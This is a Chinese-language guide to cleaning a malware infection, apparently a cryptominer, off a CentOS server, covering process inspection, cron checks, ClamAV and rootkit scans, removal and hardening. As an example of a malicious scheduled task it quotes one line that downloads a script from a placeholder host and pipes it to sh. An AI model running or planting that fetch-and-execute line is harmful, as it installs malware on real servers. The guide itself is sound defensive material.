1. 断开网络连接
立即断开受感染CentOS服务器的网络(物理断开或禁用网卡),防止恶意软件进一步扩散或窃取数据。
2. 备份重要数据
通过安全介质(如离线U盘)备份关键业务数据(如数据库、配置文件),备份前需确认数据未被恶意软件加密或篡改。
top -c(显示完整命令)或ps -ef(查看进程树),重点关注高CPU/内存占用、名称陌生(如kinsing、xmr64、sysupdate)、无签名(Command列无明确程序路径)的进程。ls -l /proc/$PID/exe($PID为可疑进程ID)查看进程对应的可执行文件路径。若路径位于非标准目录(如/tmp、/dev/shm)或文件属性异常(如无所有者、权限为-rwsr-xr-x),则可能为恶意进程。systemctl list-unit-files --state=enabled(CentOS 7+)或chkconfig --list(CentOS 6及以下),查看是否有未授权的自动启动服务;检查/etc/rc.local、/etc/init.d/目录,确认是否有新增的可疑脚本。crontab -l,检查是否有异常命令(如频繁下载脚本、调用挖矿程序)。/etc/crontab、/etc/cron.d/、/etc/cron.hourly/、/etc/cron.daily/等目录,确认是否有非业务需求的定时任务(如*/5 * * * * wget -qO- http://malicious-site.com/script.sh | sh)。sudo yum install epel-release && sudo yum install clamav clamav-update -y;sudo systemctl stop clamav-freshclam && sudo freshclam && sudo systemctl start clamav-freshclam;sudo clamscan -r -i /(递归扫描根目录,仅显示感染文件);sudo clamscan -r --remove /(扫描并直接删除感染文件,建议先备份)。chkrootkit:sudo yum install chkrootkit -y,运行sudo chkrootkit扫描系统是否存在rootkit(如lrk、chkutmp);rkhunter:sudo yum install rkhunter -y,运行sudo rkhunter --check检查系统文件完整性,重点关注/bin、/sbin、/usr/bin等目录。kill -9 $PID($PID为可疑进程ID)强制终止进程;sudo kill -9 $PID;rm -rf /path/to/malicious/file删除恶意文件(如/lib/libudev.so、/tmp/gcc.sh);/etc、/usr/bin)的文件,删除前需确认备份(如cp /etc/passwd /etc/passwd.bak)。sudo systemctl stop malicious-service && sudo systemctl disable malicious-service(CentOS 7+);或sudo chkconfig malicious-service off(CentOS 6及以下)。crontab -e删除异常任务,或运行sudo rm -f /etc/cron.hourly/malicious-script删除系统级计划任务。/etc、/usr/bin、/lib等易被篡改的目录添加不可修改属性,防止恶意软件重新植入:sudo chattr +i /etc/passwd /etc/shadow /etc/group /lib/libudev.so(解除保护时用sudo chattr -i)。sudo yum update -y安装最新安全补丁,修复已知漏洞(如OpenSSL、Glibc漏洞);apache用户而非root),设置目录权限(如chmod 750 /var/www/html),避免恶意软件通过漏洞提权。iptables或firewalld限制不必要的网络访问(如关闭SSH默认端口22,仅允许可信IP连接):sudo firewall-cmd --permanent --add-rich-rule='rule family="ipv4" source address="192.168.1.100" port port="22" protocol="tcp" accept';sudo firewall-cmd --reload。fail2ban(sudo yum install fail2ban -y)并配置/etc/fail2ban/jail.local,封禁多次登录失败的IP地址(如SSH暴力破解)。/var/log/messages、/var/log/secure),及时发现异常。root远程登录),使用密钥认证替代密码认证。